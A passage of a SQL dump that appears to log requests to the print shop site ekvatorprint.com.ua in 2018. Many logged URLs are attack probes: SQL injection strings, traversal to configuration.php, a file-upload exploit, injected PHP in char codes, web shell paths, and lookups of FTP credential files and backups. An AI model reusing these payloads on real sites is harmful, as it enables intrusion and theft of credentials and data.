00:00:00',301),(13063,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:13','0000-00-00 00:00:00',301),(13064,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:14','0000-00-00 00:00:00',301),(13065,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:14','0000-00-00 00:00:00',301),(13066,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:14','0000-00-00 00:00:00',301),(13067,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:14','0000-00-00 00:00:00',301),(13068,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:14','0000-00-00 00:00:00',301),(13069,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:14','0000-00-00 00:00:00',301),(13070,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:14','0000-00-00 00:00:00',301),(13071,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:14','0000-00-00 00:00:00',301),(13072,'http://ekvatorprint.com.ua/images/thumbnails/images/pimeri_shablonov/м',NULL,'','',1,0,'2018-03-29 22:08:15','0000-00-00 00:00:00',301),(13073,'http://ekvatorprint.com.ua/modules/namamodule/uploadimage.php',NULL,'http://ekvatorprint.com.ua/modules/namamodule/uploadimage.php','',1,0,'2018-03-30 03:22:12','0000-00-00 00:00:00',301),(13074,'http://ekvatorprint.com.ua/install/install.php?step=4',NULL,'','',1,0,'2018-03-31 01:20:03','0000-00-00 00:00:00',301),(13075,'http://ekvatorprint.com.ua/wp-content/plugins/gallery-plugin/css/stylesheet.css',NULL,'','',3,0,'2018-03-31 20:36:40','0000-00-00 00:00:00',301),(13076,'http://ekvatorprint.com.ua/printing-on-vinyl@10',NULL,'http://ekvatorprint.com.ua/printing-on-vinyl%4010','',2,0,'2018-03-31 22:22:37','0000-00-00 00:00:00',301),(13077,'http://ekvatorprint.com.ua/outdoor-advertising@10',NULL,'http://ekvatorprint.com.ua/outdoor-advertising@10','',1,0,'2018-04-01 05:41:34','0000-00-00 00:00:00',301),(13078,'http://ekvatorprint.com.ua/print-billboards@10',NULL,'http://ekvatorprint.com.ua/print-billboards@10','',1,0,'2018-04-01 07:53:55','0000-00-00 00:00:00',301),(13079,'http://ekvatorprint.com.ua/printing-on-canvas@10',NULL,'http://ekvatorprint.com.ua/printing-on-canvas%4010','',2,0,'2018-04-01 08:48:26','0000-00-00 00:00:00',301),(13080,'http://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../izoc.php',NULL,'http://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../izoc.php','',4,0,'2018-04-01 21:24:52','0000-00-00 00:00:00',301),(13081,'http://ekvatorprint.com.ua/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.css','',1,0,'2018-04-03 08:24:42','0000-00-00 00:00:00',301),(13082,'http://ekvatorprint.com.ua/themes/zicepanel/components/uploadify/uploadify.css',NULL,'http://ekvatorprint.com.ua/themes/zicepanel/components/uploadify/uploadify.css','',1,0,'2018-04-03 08:24:43','0000-00-00 00:00:00',301),(13083,'http://ekvatorprint.com.ua/XAttacker.gif',NULL,'','',3,0,'2018-04-03 12:17:01','0000-00-00 00:00:00',301),(13084,'http://ekvatorprint.com.ua/images/XAttacker.txt',NULL,'','',3,0,'2018-04-03 12:17:02','0000-00-00 00:00:00',301),(13085,'http://ekvatorprint.com.ua/images/jdownloads/screenshots/XAttacker.php.j?X=Attacker',NULL,'','',3,0,'2018-04-03 12:17:02','0000-00-00 00:00:00',301),(13086,'http://ekvatorprint.com.ua/media/XAttacker.php?X=Attacker',NULL,'','',3,0,'2018-04-03 12:17:03','0000-00-00 00:00:00',301),(13087,'http://ekvatorprint.com.ua/media/XAttacker.txt',NULL,'','',3,0,'2018-04-03 12:17:03','0000-00-00 00:00:00',301),(13088,'http://ekvatorprint.com.ua/XAttacker.php?X=Attacker',NULL,'','',5,0,'2018-04-03 12:17:04','0000-00-00 00:00:00',301),(13089,'http://ekvatorprint.com.ua/XAttacker.txt',NULL,'','',3,0,'2018-04-03 12:17:05','0000-00-00 00:00:00',301),(13090,'http://ekvatorprint.com.ua/tmp/plupload/XAttacker.html',NULL,'','',3,0,'2018-04-03 12:17:06','0000-00-00 00:00:00',301),(13091,'http://ekvatorprint.com.ua/images/XAttacker.gif',NULL,'','',3,0,'2018-04-03 12:17:09','0000-00-00 00:00:00',301),(13092,'http://ekvatorprint.com.ua/images/thumbnails/images/oplata_za_zakaz/vze+yslygi_arhiv-fill-238x215.jpg',NULL,'','',2,0,'2018-04-03 15:52:25','0000-00-00 00:00:00',301),(13093,'http://ekvatorprint.com.ua/images/thumbnails/images/oplata_za_zakaz/detalnaya+informacia-fill-237x215.jpg',NULL,'','',4,0,'2018-04-03 15:52:26','0000-00-00 00:00:00',301),(13094,'http://ekvatorprint.com.ua/images/oplata_za_zakaz/vze+yslygi_arhiv.jpg',NULL,'','',4,0,'2018-04-03 15:52:26','0000-00-00 00:00:00',301),(13095,'http://ekvatorprint.com.ua/ckupload.php',NULL,'','',1,0,'2018-04-04 00:28:08','0000-00-00 00:00:00',301),(13096,'http://ekvatorprint.com.ua/administrator/logs.php',NULL,'http://site.ru','',2,0,'2018-04-04 04:41:42','0000-00-00 00:00:00',301),(13097,'http://ekvatorprint.com.ua/components/com_foxcontact/f.php',NULL,'http://site.ru','',1,0,'2018-04-04 04:41:44','0000-00-00 00:00:00',301),(13098,'http://ekvatorprint.com.ua/images/bacot.php',NULL,'http://site.ru','',1,0,'2018-04-04 05:09:34','0000-00-00 00:00:00',301),(13099,'http://ekvatorprint.com.ua/wp-mains.php',NULL,'http://site.ru','',1,0,'2018-04-04 05:22:29','0000-00-00 00:00:00',301),(13100,'http://ekvatorprint.com.ua/pagead/conversion.js',NULL,'','',2,0,'2018-04-04 10:53:54','0000-00-00 00:00:00',301),(13101,'http://ekvatorprint.com.ua/wp-content/themes/qualifire//scripts/admin/uploadify/uploadify.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/qualifire//scripts/admin/uploadify/uploadify.css','',1,0,'2018-04-04 18:40:02','0000-00-00 00:00:00',301),(13102,'http://ekvatorprint.com.ua/k.php',NULL,'http://site.ru','',4,0,'2018-04-05 04:19:03','0000-00-00 00:00:00',301),(13103,'http://ekvatorprint.com.ua/admin/_content/_About/AspCms_AboutEdit.asp',NULL,'http://ekvatorprint.com.ua/admin/_content/_About/AspCms_AboutEdit.asp','',3,0,'2018-04-05 06:15:39','0000-00-00 00:00:00',301),(13104,'http://ekvatorprint.com.ua/admin_aspcms/_system/AspCms_SiteSetting.asp',NULL,'http://ekvatorprint.com.ua/admin_aspcms/_system/AspCms_SiteSetting.asp','',3,0,'2018-04-05 06:15:40','0000-00-00 00:00:00',301),(13105,'http://ekvatorprint.com.ua/plus/mytag_js.php?dopost=saveedit&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=57&arrs2[]=48&arrs2[]=44&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=99&arrs2[]=109&arrs2[]=115&arrs2[]=32&arrs2[]=53&arrs2[]=46&arrs2[]=55&arrs2[]=32&arrs2[]=48&arrs2[]=100&arrs2[]=97&arrs2[]=121&arrs2[]=60&arrs2[]=98&arrs2[]=114&arrs2[]=62&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=44&',NULL,'http://ekvatorprint.com.ua/plus/mytag_js.php?dopost=saveedit&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=57&arrs2[]=48&arrs2[]=44&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=99&arrs2[]=109&arrs2[]=115&arrs2[]=32&arrs2[]=53&arrs2[]=46&arrs2[]=55&arrs2[]=32&arrs2[]=48&arrs2[]=100&arrs2[]=97&arrs2[]=121&arrs2[]=60&arrs2[]=98&arrs2[]=114&arrs2[]=62&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=44&','',3,0,'2018-04-05 06:15:43','0000-00-00 00:00:00',301),(13106,'http://ekvatorprint.com.ua/plus/recommend.php',NULL,'http://ekvatorprint.com.ua/plus/recommend.php','',3,0,'2018-04-05 06:15:46','0000-00-00 00:00:00',301),(13107,'http://ekvatorprint.com.ua/plus/search.php',NULL,'http://ekvatorprint.com.ua/plus/search.php','',3,0,'2018-04-05 06:15:47','0000-00-00 00:00:00',301),(13108,'http://ekvatorprint.com.ua/install/index.php.bak',NULL,'http://ekvatorprint.com.ua/install/index.php.bak','',4,0,'2018-04-05 06:15:47','0000-00-00 00:00:00',301),(13109,'http://ekvatorprint.com.ua/index.php?option=com_formmaker&view=formmaker&id=1 UNION ALL SELECT NULL, NULL,NULL,NULL,NULL,CONCAT(0x7165696a71,IFNULL(CAST(md5(3.1415) AS CHAR),0x20), 0x7175647871),NULL,NULL,NULL,NULL,NULL,NULL,NULL#',NULL,'http://ekvatorprint.com.ua/index.php?option=com_formmaker&view=formmaker&id=1%20UNION%20ALL%20SELECT%20NULL,%20NULL,NULL,NULL,NULL,CONCAT(0x7165696a71,IFNULL(CAST(md5(3.1415)%20AS%20CHAR),0x20),%200x7175647871),NULL,NULL,NULL,NULL,NULL,NULL,NULL%23','',3,0,'2018-04-05 06:16:12','0000-00-00 00:00:00',301),(13110,'http://ekvatorprint.com.ua/inc/ajax.php?ac=digg&ac2=&id=1&tab=vod+union+select/**/+null,md5(1231412414)+from+mac_manager+-- ',NULL,'http://ekvatorprint.com.ua/inc/ajax.php?ac=digg&ac2=&id=1&tab=vod+union+select/**/+null,md5(1231412414)+from+mac_manager+--%20','',3,0,'2018-04-05 06:16:14','0000-00-00 00:00:00',301),(13111,'http://ekvatorprint.com.ua/inc/api.php?ac=videolist&t=0&pg=0&ids=1) Union sElect/**/md5(602589),NULL,* 48NULL#',NULL,'http://ekvatorprint.com.ua/inc/api.php?ac=videolist&t=0&pg=0&ids=1%29%20Union%20sElect/**/md5(602589),NULL,* 48NULL%23','',3,0,'2018-04-05 06:16:14','0000-00-00 00:00:00',301),(13112,'http://ekvatorprint.com.ua/api.php',NULL,'http://ekvatorprint.com.ua/api.php','',3,0,'2018-04-05 06:16:57','0000-00-00 00:00:00',301),(13113,'http://ekvatorprint.com.ua/news/html',NULL,'http://ekvatorprint.com.ua/news/html','',3,0,'2018-04-05 06:19:07','0000-00-00 00:00:00',301),(13114,'http://ekvatorprint.com.ua/search/index.php',NULL,'http://ekvatorprint.com.ua/search/index.php','',3,0,'2018-04-05 06:19:08','0000-00-00 00:00:00',301),(13115,'http://ekvatorprint.com.ua/login.action',NULL,'http://ekvatorprint.com.ua/login.action','',13,0,'2018-04-05 06:19:22','0000-00-00 00:00:00',301),(13116,'http://ekvatorprint.com.ua/httpmon.php',NULL,'http://ekvatorprint.com.ua/httpmon.php','',3,0,'2018-04-05 06:19:31','0000-00-00 00:00:00',301),(13117,'http://ekvatorprint.com.ua/jsrpc.php',NULL,'http://ekvatorprint.com.ua/jsrpc.php','',6,0,'2018-04-05 06:19:39','0000-00-00 00:00:00',301),(13118,'http://ekvatorprint.com.ua/api/call.php',NULL,'http://ekvatorprint.com.ua/api/call.php','',3,0,'2018-04-05 06:19:40','0000-00-00 00:00:00',301),(13119,'http://ekvatorprint.com.ua/NewsType.asp',NULL,'http://ekvatorprint.com.ua/NewsType.asp','',3,0,'2018-04-05 06:19:40','0000-00-00 00:00:00',301),(13120,'http://ekvatorprint.com.ua/components/com_foxcontact/z.php',NULL,'http://site.ru','',2,0,'2018-04-05 20:41:33','0000-00-00 00:00:00',301),(13121,'http://ekvatorprint.com.ua/m1.php',NULL,'http://site.ru','',1,0,'2018-04-05 22:57:55','0000-00-00 00:00:00',301),(13122,'http://ekvatorprint.com.ua/components/com_b2jcontact/izoc.php',NULL,'','',5,0,'2018-04-06 10:29:48','0000-00-00 00:00:00',301),(13123,'http://ekvatorprint.com.ua/dsfghs.php',NULL,'http://site.ru','',1,0,'2018-04-06 11:51:48','0000-00-00 00:00:00',301),(13124,'http://ekvatorprint.com.ua/cache/sok.php',NULL,'http://site.ru','',2,0,'2018-04-06 11:52:33','0000-00-00 00:00:00',301),(13125,'http://ekvatorprint.com.ua/fghhgfs.php',NULL,'http://site.ru','',3,0,'2018-04-06 12:21:15','0000-00-00 00:00:00',301),(13126,'http://ekvatorprint.com.ua/wp-content/themes/deep-blue/megaframe/megapanel/inc/functions.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/deep-blue/megaframe/megapanel/inc/functions.php','',1,0,'2018-04-06 18:01:04','0000-00-00 00:00:00',301),(13127,'http://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../me.php',NULL,'','',1,0,'2018-04-06 21:54:55','0000-00-00 00:00:00',301),(13128,'http://ekvatorprint.com.ua/components/com_b2jcontact/me.php',NULL,'','',1,0,'2018-04-06 21:55:13','0000-00-00 00:00:00',301),(13129,'http://ekvatorprint.com.ua/wp-content/plugins/mac-dock-gallery/css/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/mac-dock-gallery/css/style.css','',1,0,'2018-04-06 22:17:16','0000-00-00 00:00:00',301),(13130,'http://ekvatorprint.com.ua/wp-content/themes/drochilli-child/uploadify/uploadify.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/drochilli-child/uploadify/uploadify.css','',1,0,'2018-04-07 06:01:08','0000-00-00 00:00:00',301),(13131,'http://ekvatorprint.com.ua/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.css','',2,0,'2018-04-07 06:01:08','0000-00-00 00:00:00',301),(13132,'http://ekvatorprint.com.ua/component/option,com_jambook/Itemid,255/task,add/',NULL,'','',1,0,'2018-04-07 06:51:38','0000-00-00 00:00:00',301),(13133,'http://ekvatorprint.com.ua/component/vitabook/?new=true',NULL,'','',1,0,'2018-04-07 06:51:45','0000-00-00 00:00:00',301),(13134,'http://ekvatorprint.com.ua/.smileys/systems.php',NULL,'http://site.ru','',1,0,'2018-04-07 08:24:27','0000-00-00 00:00:00',301),(13135,'http://ekvatorprint.com.ua/.smileys/bacot.php',NULL,'http://site.ru','',3,0,'2018-04-07 12:20:46','0000-00-00 00:00:00',301),(13136,'http://ekvatorprint.com.ua/header_img.php.suspected',NULL,'http://site.ru','',3,0,'2018-04-07 19:24:53','0000-00-00 00:00:00',301),(13137,'http://ekvatorprint.com.ua/component/kide/',NULL,'','',1,0,'2018-04-07 20:44:16','0000-00-00 00:00:00',301),(13138,'http://ekvatorprint.com.ua/images/stories/cmd.php',NULL,'','',3,0,'2018-04-08 16:36:12','0000-00-00 00:00:00',301),(13139,'http://ekvatorprint.com.ua/Camilles.php',NULL,'http://site.ru','',2,0,'2018-04-08 18:26:59','0000-00-00 00:00:00',301),(13140,'http://ekvatorprint.com.ua/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php','',3,0,'2018-04-10 12:00:32','0000-00-00 00:00:00',301),(13141,'http://ekvatorprint.com.ua/sites/all/libraries/elfinder/src/connectors/php/connector.php',NULL,'http://ekvatorprint.com.ua/sites/all/libraries/elfinder/src/connectors/php/connector.php','',1,0,'2018-04-11 02:33:32','0000-00-00 00:00:00',301),(13142,'http://ekvatorprint.com.ua/images/oplata_za_zakaz/vzeyslygi_arhiv.jpg',NULL,'https://slack.com','',1,0,'2018-04-11 13:39:25','0000-00-00 00:00:00',301),(13143,'http://ekvatorprint.com.ua/.git/ORIG_HEAD',NULL,'http://www.google.com/','',1,0,'2018-04-11 16:24:28','0000-00-00 00:00:00',301),(13144,'http://ekvatorprint.com.ua/modules/productpageadverts/uploadimage.php',NULL,'http://ekvatorprint.com.ua/modules/productpageadverts/uploadimage.php','',1,0,'2018-04-12 04:03:57','0000-00-00 00:00:00',301),(13145,'http://ekvatorprint.com.ua/wp-cahce.php',NULL,'','',2,0,'2018-04-12 13:49:55','0000-00-00 00:00:00',301),(13146,'http://ekvatorprint.com.ua/wp-logs.php?action=test',NULL,'','',2,0,'2018-04-12 20:22:51','0000-00-00 00:00:00',301),(13147,'http://ekvatorprint.com.ua/sites/default/files/up.php',NULL,'http://ekvatorprint.com.ua/sites/default/files/up.php','',4,0,'2018-04-13 05:27:11','0000-00-00 00:00:00',301),(13148,'http://ekvatorprint.com.ua/images/game/igra-kubok-mutantov.jpg',NULL,'http://ekvatorprint.com.ua','',1,0,'2018-04-15 14:06:12','0000-00-00 00:00:00',301),(13149,'http://ekvatorprint.com.ua/user/register?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_ajax',NULL,'','',3,0,'2018-04-15 20:42:04','0000-00-00 00:00:00',301),(13150,'http://ekvatorprint.com.ua/hivcxa.php',NULL,'','',2,0,'2018-04-16 10:28:35','0000-00-00 00:00:00',301),(13151,'http://ekvatorprint.com.ua/backup/db/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-16 14:35:05','0000-00-00 00:00:00',301),(13152,'http://ekvatorprint.com.ua/backup-sql/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-16 16:43:28','0000-00-00 00:00:00',301),(13153,'http://ekvatorprint.com.ua/images/smilies/canvaspicture1.jp',NULL,'','',1,0,'2018-04-16 17:52:22','0000-00-00 00:00:00',301),(13154,'http://ekvatorprint.com.ua/db/backup/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-16 18:53:55','0000-00-00 00:00:00',301),(13155,'http://ekvatorprint.com.ua/backup/sql/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-16 21:05:07','0000-00-00 00:00:00',301),(13156,'http://ekvatorprint.com.ua/system/data/databackup/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-17 01:27:36','0000-00-00 00:00:00',301),(13157,'http://ekvatorprint.com.ua/backup-files/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-17 03:38:56','0000-00-00 00:00:00',301),(13158,'http://ekvatorprint.com.ua/backup-files/db/',NULL,'http://ekvatorprint.com.ua/','',1,0,'2018-04-17 05:48:11','0000-00-00 00:00:00',301),(13159,'http://ekvatorprint.com.ua/freichat/client/plugins/upload/upload.php',NULL,'http://ekvatorprint.com.ua/freichat/client/plugins/upload/upload.php','',3,0,'2018-04-17 10:15:11','0000-00-00 00:00:00',301),(13160,'http://ekvatorprint.com.ua/unz.php',NULL,'','',2,0,'2018-04-17 10:36:33','0000-00-00 00:00:00',301),(13161,'http://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../test.php',NULL,'http://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../test.php','',2,0,'2018-04-18 09:21:58','0000-00-00 00:00:00',301),(13162,'http://ekvatorprint.com.ua/wp-content/plugins/gallery-plugin/upload/php.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/gallery-plugin/upload/php.php','',1,0,'2018-04-18 16:57:35','0000-00-00 00:00:00',301),(13163,'http://ekvatorprint.com.ua/admin/images/cal_date_over.gif',NULL,'','',14,0,'2018-04-19 06:49:39','0000-00-00 00:00:00',301),(13164,'http://ekvatorprint.com.ua/administrator//admin/images/cal_date_over.gif',NULL,'','',2,0,'2018-04-19 06:49:40','0000-00-00 00:00:00',301),(13165,'http://ekvatorprint.com.ua/administrator/admin/login.php',NULL,'','',2,0,'2018-04-19 06:50:07','0000-00-00 00:00:00',301),(13166,'http://ekvatorprint.com.ua/images/vuln2.php',NULL,'','',2,0,'2018-04-19 06:51:44','0000-00-00 00:00:00',301),(13167,'http://ekvatorprint.com.ua/administrator/images/vuln2.php',NULL,'','',1,0,'2018-04-19 06:51:45','0000-00-00 00:00:00',301),(13168,'http://ekvatorprint.com.ua/tmp/vuln2.php',NULL,'','',1,0,'2018-04-19 06:51:59','0000-00-00 00:00:00',301),(13169,'http://ekvatorprint.com.ua/administrator/tmp/vuln2.php',NULL,'','',1,0,'2018-04-19 06:52:00','0000-00-00 00:00:00',301),(13170,'http://ekvatorprint.com.ua/images/vuln.php',NULL,'','',2,0,'2018-04-19 06:52:06','0000-00-00 00:00:00',301),(13171,'http://ekvatorprint.com.ua/administrator/images/vuln.php',NULL,'','',1,0,'2018-04-19 06:52:07','0000-00-00 00:00:00',301),(13172,'http://ekvatorprint.com.ua/tmp/vuln.php',NULL,'','',2,0,'2018-04-19 06:52:12','0000-00-00 00:00:00',301),(13173,'http://ekvatorprint.com.ua/administrator/tmp/vuln.php',NULL,'','',1,0,'2018-04-19 06:52:12','0000-00-00 00:00:00',301),(13174,'http://ekvatorprint.com.ua/administrator/administrator/index.php',NULL,'','',4,0,'2018-04-19 06:52:20','0000-00-00 00:00:00',301),(13175,'http://ekvatorprint.com.ua/administrator/administrator/components/com_alberghi/upload.alberghi.php',NULL,'','',2,0,'2018-04-19 06:52:53','0000-00-00 00:00:00',301),(13176,'http://ekvatorprint.com.ua/administrator/components/com_alberghi/upload.alberghi.php',NULL,'','',3,0,'2018-04-19 06:52:55','0000-00-00 00:00:00',301),(13177,'http://ekvatorprint.com.ua/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=',NULL,'','',3,0,'2018-04-19 06:53:30','0000-00-00 00:00:00',301),(13178,'http://ekvatorprint.com.ua/administrator/media/vuln.txt',NULL,'','',1,0,'2018-04-19 06:54:17','0000-00-00 00:00:00',301),(13179,'http://ekvatorprint.com.ua/media/vuln.txt',NULL,'','',16,0,'2018-04-19 06:54:18','0000-00-00 00:00:00',301),(13180,'http://ekvatorprint.com.ua/administrator/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',2,0,'2018-04-19 06:54:32','0000-00-00 00:00:00',301),(13181,'http://ekvatorprint.com.ua/administrator//images/pwn.gif',NULL,'','',2,0,'2018-04-19 06:56:37','0000-00-00 00:00:00',301),(13182,'http://ekvatorprint.com.ua/images/pwn.gif',NULL,'','',17,0,'2018-04-19 06:56:38','0000-00-00 00:00:00',301),(13183,'http://ekvatorprint.com.ua/index.php?option=com_macgallery&view=download&albumid=../../configuration.php',NULL,'','',3,0,'2018-04-19 06:56:48','0000-00-00 00:00:00',301),(13184,'http://ekvatorprint.com.ua/administrator/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=',NULL,'','',2,0,'2018-04-19 06:58:22','0000-00-00 00:00:00',301),(13185,'http://ekvatorprint.com.ua/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=',NULL,'','',3,0,'2018-04-19 06:58:22','0000-00-00 00:00:00',301),(13186,'http://ekvatorprint.com.ua/administrator/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media',NULL,'','',2,0,'2018-04-19 06:58:47','0000-00-00 00:00:00',301),(13187,'http://ekvatorprint.com.ua/user/password',NULL,'','',2,0,'2018-04-20 19:25:45','0000-00-00 00:00:00',301),(13188,'http://ekvatorprint.com.ua/wp-content/themes/gallery/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/gallery/style.css','',1,0,'2018-04-20 22:12:52','0000-00-00 00:00:00',301),(13189,'http://ekvatorprint.com.ua/wp-print.php?script=1',NULL,'','',2,0,'2018-04-21 17:15:22','0000-00-00 00:00:00',301),(13190,'http://ekvatorprint.com.ua/WS_FTP.INI',NULL,'','',3,0,'2018-04-21 19:06:43','0000-00-00 00:00:00',301),(13191,'http://ekvatorprint.com.ua/filezilla.xml',NULL,'','',3,0,'2018-04-21 19:06:43','0000-00-00 00:00:00',301),(13192,'http://ekvatorprint.com.ua/sitemanager.xml',NULL,'','',3,0,'2018-04-21 19:06:44','0000-00-00 00:00:00',301),(13193,'http://ekvatorprint.com.ua/FileZilla.xml',NULL,'','',3,0,'2018-04-21 19:06:44','0000-00-00 00:00:00',301),(13194,'http://ekvatorprint.com.ua/winscp.ini',NULL,'','',3,0,'2018-04-21 19:06:44','0000-00-00 00:00:00',301),(13195,'http://ekvatorprint.com.ua/WinSCP.ini',NULL,'','',3,0,'2018-04-21 19:06:44','0000-00-00 00:00:00',301),(13196,'http://ekvatorprint.com.ua/sitemap.xml.php',NULL,'','',1,0,'2018-04-22 11:28:49','0000-00-00 00:00:00',301),(13197,'http://ekvatorprint.com.ua/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx',NULL,'http://ekvatorprint.com.ua/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx','',2,0,'2018-04-23 08:56:27','0000-00-00 00:00:00',301),(13198,'http://ekvatorprint.com.ua/,',NULL,'','',4,0,'2018-04-24 06:03:31','0000-00-00 00:00:00',301),(13199,'http://ekvatorprint.com.ua/MSD/sql.php',NULL,'','',2,0,'2018-04-24 09:05:08','0000-00-00 00:00:00',301),(13200,'http://ekvatorprint.com.ua/Msd/sql.php',NULL,'','',2,0,'2018-04-24 09:05:08','0000-00-00 00:00:00',301),(13201,'http://ekvatorprint.com.ua/MySQLDumper1.24.4/msd1.24.4/sql.php',NULL,'','',2,0,'2018-04-24 09:05:08','0000-00-00 00:00:00',301),(13202,'http://ekvatorprint.com.ua/MySQLDumper1.24.4/sql.php',NULL,'','',2,0,'2018-04-24 09:05:09','0000-00-00 00:00:00',301),(13203,'http://ekvatorprint.com.ua/MySQLDumper1.24.4stable/sql.php',NULL,'','',2,0,'2018-04-24 09:05:09','0000-00-00 00:00:00',301),(13204,'http://ekvatorprint.com.ua/MySqlDumper/sql.php',NULL,'','',2,0,'2018-04-24 09:05:09','0000-00-00 00:00:00',301),(13205,'http://ekvatorprint.com.ua/Mysqldumper/sql.php',NULL,'','',2,0,'2018-04-24 09:05:09','0000-00-00 00:00:00',301),(13206,'http://ekvatorprint.com.ua/admin/sql.php',NULL,'','',2,0,'2018-04-24 09:05:09','0000-00-00 00:00:00',301),(13207,'http://ekvatorprint.com.ua/admin/sql/sql.php',NULL,'','',2,0,'2018-04-24 09:05:10','0000-00-00 00:00:00',301),(13208,'http://ekvatorprint.com.ua/backup/sql.php',NULL,'','',2,0,'2018-04-24 09:05:10','0000-00-00 00:00:00',301),(13209,'http://ekvatorprint.com.ua/backups/sql.php',NULL,'','',2,0,'2018-04-24 09:05:10','0000-00-00 00:00:00',301),(13210,'http://ekvatorprint.com.ua/database/sql.php',NULL,'','',2,0,'2018-04-24 09:05:10','0000-00-00 00:00:00',301),(13211,'http://ekvatorprint.com.ua/datenbank/sql.php',NULL,'','',2,0,'2018-04-24 09:05:10','0000-00-00 00:00:00',301),(13212,'http://ekvatorprint.com.ua/dump/sql.php',NULL,'','',2,0,'2018-04-24 09:05:10','0000-00-00 